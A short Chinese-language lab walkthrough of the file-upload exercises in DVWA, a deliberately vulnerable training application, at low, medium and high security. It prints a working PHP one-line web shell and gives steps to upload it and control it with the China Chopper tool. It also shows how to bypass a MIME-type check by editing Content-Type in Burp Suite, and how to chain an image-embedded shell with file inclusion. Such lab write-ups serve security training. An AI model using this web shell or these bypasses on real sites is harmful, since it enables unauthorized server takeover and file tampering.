LOW
1.首先找到一张小图片,符合上传文件的大小以及格式;
2.编辑一句话木马文件,将格式改为php;
一句话木马:
<?php @eval($_POST['attack']) ;?>
3.将小图片上传至网站中,显示上传成功;
4.将小马上传至网站,上传成功;
5.将小马的路径与当前网站的路径结合并复制,然后使用中国菜刀进行链接;
路径结果:
6.中国菜刀成功链接并能进行文件管理且下载、删除或新建文件。
路径后的小框为一句话木马中单引号部分内容,如本次使用的一句话木马为:
一句话木马:
<?php @eval($_POST['attack']) ;?>
小框的内容就为:attack
选择好脚本类型后点击添加;
右键该行地址选择文件管理即可对文件进行操作。
MEDIUM
1.将靶机的安全级别调为中级;
2.上传图片,可正常上传;
3.上传小马,上传失败,查看源码发现格式无法通过检测,只能上传MIME类型的image/jpeg类型。而.php为application/octet-stream类型;
4.使用kali里的burp suite开启代理,将代理改为监听所有接口,然后将物理机的代理改为kali的IP连上代理;
5.将burp suite的拦截打开,在物理机上上传小马;
6.在burp suite里拦截的信息中修改Content-Type中的类型,将application/octet-stream改为 image/jpeg,点击forward转发;
7.成功绕过检测上传小马,使用中国菜刀即可连接进行操作。
HIGH
1.先制作图片一句话木马;
此处使用的是edjpgcom软件,将图片之间拖至该软件的.EXE运行文件上即可成功制作;
2.上传该图片;
3.使用文件包含漏洞,包含改图片木马;
4.shell.php是生成在http://192.168.0.103/DVWA-master/DVWA-master/vulnerabilities/fi/目录下的;
5.使用中国菜刀连接该目录下的shell.php文件获得权限。
该方法即 (文件上传漏洞+文件包含漏洞 )(组合拳);